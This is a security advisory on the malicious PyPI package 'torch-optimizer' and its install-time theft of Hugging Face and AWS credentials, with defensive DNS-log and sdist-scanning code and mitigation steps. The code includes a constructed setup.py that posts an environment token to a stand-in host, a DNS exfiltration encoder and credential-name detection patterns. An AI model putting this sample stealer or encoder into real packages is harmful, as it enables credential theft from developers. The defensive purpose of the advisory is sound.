Malicious PyPI Package 'torch-optimizer' Steals Hugging Face API Tokens and AWS Credentials
Overview
A malicious package named `torch-optimizer` was discovered on the Python Package Index (PyPI). It was a look-alike of the legitimate `torch_optimizer` library and targeted AI/ML developers. The malicious package shipped a `setup.py` that ran at install time (`pip install torch-optimizer`), the point in the Python packaging flow where a source distribution gets to execute arbitrary code with the installing user's privileges.

The script was heavily obfuscated. Once decoded, it scanned the user's home directory and environment variables for credentials, specifically `HUGGING_FACE_HUB_TOKEN`, `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`. Anything it found was Base64-encoded and exfiltrated either in a DNS query or in a direct HTTPS POST to an attacker-controlled server. Base64 is an encoding, not encryption: it hides the plaintext from a casual look at the traffic and lets the data travel inside DNS labels, nothing more.

Because the package otherwise mimicked the legitimate library, a developer could install it, use it in a project and never notice the background theft. With the stolen tokens an attacker can pull private models and datasets from Hugging Face; with the AWS keys an attacker acts with whatever permissions that identity holds, up to taking over the account's infrastructure, with financial loss and intellectual property theft as the likely results. The incident fits a broader pattern of supply chain attacks against the AI development ecosystem, where specialized credentials and compute are valuable targets.
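The DNS exfiltration path described above is the one a network team can still hunt for after the fact. The following is an added example, not code from the original advisory or from the package it describes: it replays constructed resolver log lines and flags queries whose subdomain labels look like encoded data under one parent zone, then decodes them. The log format (`<epoch> query[<type>] <qname> from <client>`, loosely dnsmasq-style), the zone `c2.example.invalid` and the token value are all assumptions. It uses the URL-safe Base64 alphabet because that fits in DNS labels; the advisory does not say which Base64 variant the package used.

```python
"""Flagging credential exfiltration carried in DNS query names.

Added example for this advisory, not code from the original write-up or from
any real package. The resolver log format is an assumption (loosely
dnsmasq-style: "<epoch> query[<type>] <qname> from <client>"), and the zone
c2.example.invalid and the token value are constructed.
"""
import base64
import math
import re
from collections import Counter
from typing import List, Optional

LOG_RE = re.compile(
    r"^(?P<ts>\d+) query\[(?P<qtype>\w+)\] (?P<qname>\S+) from (?P<client>\S+)$"
)
# A DNS label carrying urlsafe-base64 data: only alphabet characters, and long
# enough that ordinary hostnames (www, api, us-east-1, huggingface) do not match.
DATA_LABEL_RE = re.compile(r"^[A-Za-z0-9_-]{16,63}$")


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded secrets sit well above plain hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def encode_exfil(payload: bytes, zone: str, label_len: int = 40) -> str:
    """Sender side as the advisory describes it: encode the secret, then hide
    the blob in subdomain labels of an attacker-controlled zone (constructed)."""
    blob = base64.urlsafe_b64encode(payload).decode().rstrip("=")
    labels = [blob[i:i + label_len] for i in range(0, len(blob), label_len)]
    return ".".join(labels + [zone])


def decode_labels(labels: List[str]) -> Optional[bytes]:
    """Re-join the data labels, restore the stripped padding, try to decode."""
    blob = "".join(labels)
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.urlsafe_b64decode(blob)
    except ValueError:
        return None


def suspicious_queries(log_text: str, min_entropy: float = 3.5) -> List[dict]:
    """One record per query whose leading labels look like encoded data."""
    hits = []
    for raw in log_text.strip().splitlines():
        m = LOG_RE.match(raw.strip())
        if not m:
            continue
        labels = m["qname"].rstrip(".").split(".")
        data_labels = [lb for lb in labels if DATA_LABEL_RE.match(lb)]
        if not data_labels or shannon_entropy("".join(data_labels)) < min_entropy:
            continue
        hits.append({
            "client": m["client"],
            "qname": m["qname"],
            # Assumes the data labels lead and the zone follows them.
            "zone": ".".join(labels[len(data_labels):]),
            "decoded": decode_labels(data_labels),
        })
    return hits


# Constructed log: two ordinary lookups and one exfil query carrying a fake token.
SECRET_PAYLOAD = b"HUGGING_FACE_HUB_TOKEN=hf_exampleTOKENvalue1234"
EXFIL_QNAME = encode_exfil(SECRET_PAYLOAD, "c2.example.invalid")
SAMPLE_LOG = f"""
1721700000 query[A] huggingface.co from 10.0.0.5
1721700001 query[A] sts.us-east-1.amazonaws.com from 10.0.0.5
1721700002 query[A] {EXFIL_QNAME} from 10.0.0.5
"""

if __name__ == "__main__":
    for hit in suspicious_queries(SAMPLE_LOG):
        preview = (hit["decoded"] or b"")[:32]
        print(f"{hit['client']} -> {hit['zone']}: {preview!r}")
```

The entropy gate is what separates this from a plain length check: a long but repetitive label (a padded hostname, a CDN prefix) scores low, while Base64 of a token scores near the alphabet maximum. Tune `min_entropy` against your own resolver logs before alerting on it.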
Affected Systems
Testing Guide
1. Check whether the package is present: `pip show torch-optimizer`. PyPI normalizes `-`, `_` and `.` in project names (PEP 503), so `pip show` with either spelling resolves to the same installed distribution, and `pip list | grep -i torch.optimizer` covers both spellings in list output. Do not stop at the name: compare the installed version against the upstream project's release history and, where you still have the downloaded archive, its SHA-256 against the hash PyPI lists for that release.
2. If it is found, assume every credential that was in the environment or the home directory at install time is compromised, and look for use of it: AWS CloudTrail for API calls made with the exposed access key, and the Hugging Face account's access-token settings for tokens or activity you do not recognize.
3. For future prevention, fetch the source archive without installing it, `pip download torch-optimizer --no-deps --no-binary :all: -d ./review`, unpack it and read `setup.py` (and `setup.cfg` / `pyproject.toml`, which can declare custom build backends and install commands) for network requests, reads of `os.environ` or of files outside the project directory, `base64`/`exec`/`eval`, and custom `cmdclass` commands. A wheel runs no `setup.py` at install time, but its module code executes on first import, so review that as well.
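Step 3 is tedious by hand across many dependencies. The following is an added example, not code from the original advisory or from the package it describes: a static triage script that opens a `.tar.gz` sdist without installing it, reads only the install-time files (`setup.py`, `setup.cfg`, `pyproject.toml`) and reports the indicators the step lists. The indicator patterns, the risk scoring and both sample `setup.py` scripts are assumptions constructed for illustration; the suspicious one has the shape the advisory describes, not the real payload.

```python
"""Static triage of a Python sdist before installing it.

Added example for this advisory, not code from the original write-up or from
the package it describes. It reads only the files that can execute or hook
into the install (setup.py, setup.cfg, pyproject.toml) and reports the
indicators the Testing Guide lists. The two sample scripts are constructed.
"""
import re
import sys
import tarfile
from pathlib import Path
from typing import Dict, List, Tuple

INSTALL_TIME_FILES = ("setup.py", "setup.cfg", "pyproject.toml")

# Indicator -> pattern applied line by line to the install-time source.
INDICATORS = {
    "network": re.compile(
        r"urllib\.request|requests\.(get|post)|http\.client|socket\.|getaddrinfo|gethostbyname"
    ),
    "credential_names": re.compile(
        r"HUGGING_FACE_HUB_TOKEN|HF_TOKEN|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY"
        r"|\.aws/credentials|huggingface/token"
    ),
    "environment_read": re.compile(r"\bos\.environ\b|\bos\.getenv\("),
    "home_directory": re.compile(r"expanduser\(\s*['\"]~|Path\.home\(\)"),
    "encoding": re.compile(r"\bbase64\.\w*encode\b|\bbinascii\.hexlify\b|\bzlib\.compress\b"),
    "dynamic_exec": re.compile(r"\b(eval|exec|compile)\s*\(|__import__\s*\(|importlib\.import_module"),
    "install_hook": re.compile(r"\bcmdclass\s*=|class\s+\w+\((install|develop|egg_info|build_py)\)"),
}

Finding = Tuple[int, str, str]  # (line number, indicator, stripped source line)


def scan_source(text: str) -> List[Finding]:
    """Every indicator hit in an install-time script, in source order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def risk_level(findings: List[Finding]) -> str:
    """Harvesting plus a network path, or exec plus encoding, is a hard stop;
    any single indicator still deserves a human look."""
    names = {name for _, name, _ in findings}
    harvests = bool(names & {"credential_names", "environment_read", "home_directory"})
    if (harvests and "network" in names) or ({"dynamic_exec", "encoding"} <= names):
        return "high"
    return "review" if names else "low"


def scan_sdist(path: str) -> Dict[str, List[Finding]]:
    """Open a .tar.gz sdist without installing it; scan only install-time files."""
    results = {}
    with tarfile.open(path, "r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and Path(member.name).name in INSTALL_TIME_FILES:
                text = tar.extractfile(member).read().decode("utf-8", errors="replace")
                results[member.name] = scan_source(text)
    return results


# Constructed: the shape of an install-time stealer as the advisory describes it.
SUSPICIOUS_SETUP = '''
import os, base64, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        token = os.environ.get("HUGGING_FACE_HUB_TOKEN", "")
        blob = base64.b64encode(token.encode())
        urllib.request.urlopen("https://collector.example.invalid/", data=blob)

setup(name="examplepkg", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed: an ordinary declarative setup.py with nothing to flag.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="examplepkg", version="1.0.0", packages=find_packages())
'''

if __name__ == "__main__":
    if len(sys.argv) == 2:  # python inspect_sdist.py examplepkg-1.0.0.tar.gz
        for fname, findings in scan_sdist(sys.argv[1]).items():
            print(f"{fname}: {risk_level(findings)}")
            for lineno, name, line in findings:
                print(f"  L{lineno} [{name}] {line}")
    else:
        print("constructed sample:", risk_level(scan_source(SUSPICIOUS_SETUP)))
```

Treat this as a triage filter, not a verdict: heavily obfuscated scripts like the one in this incident may hide the strings behind `exec` of a decoded blob, which is exactly why `dynamic_exec` together with `encoding` is scored as high on its own.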
Mitigation Steps
1. **Remove the Package:** Run `pip uninstall torch-optimizer` in every environment where it was installed (virtualenvs, container images, CI caches), and rebuild any image that baked it in.
2. **Rotate Credentials:** Revoke, then reissue, every credential the script could have read: Hugging Face tokens (including one cached by `huggingface-cli login` under `~/.cache/huggingface/`) and AWS access keys (including profiles in `~/.aws/credentials`). Prefer short-lived credentials (IAM roles, SSO) to long-lived keys sitting in environment variables on developer machines, so the next install-time stealer has less to take.
3. **Use Dependency Scanning:** Run `pip-audit` (or a commercial equivalent) in CI to check resolved dependencies against advisory databases. It catches packages already reported as vulnerable or malicious, not a fresh, unreported upload, so it complements rather than replaces review.
4. **Pin Dependencies:** Lock versions together with hashes (`pip-compile --generate-hashes` from pip-tools, or `poetry.lock`) and install with `pip install --require-hashes -r requirements.txt`. Hashes stop a lock file from silently resolving to a different or replaced artifact later; they do not protect the first time a malicious package is added, which is what step 5 is for.
5. **Vet Dependencies:** Before adding a dependency, confirm that the PyPI project links to the expected repository, that the author matches, that the release history looks normal, and that the distribution's contents match the repository tag. Download counts alone are weak evidence, since they can be inflated.
Patch Details
The malicious package `torch-optimizer` was removed from the PyPI registry on 2025-07-23.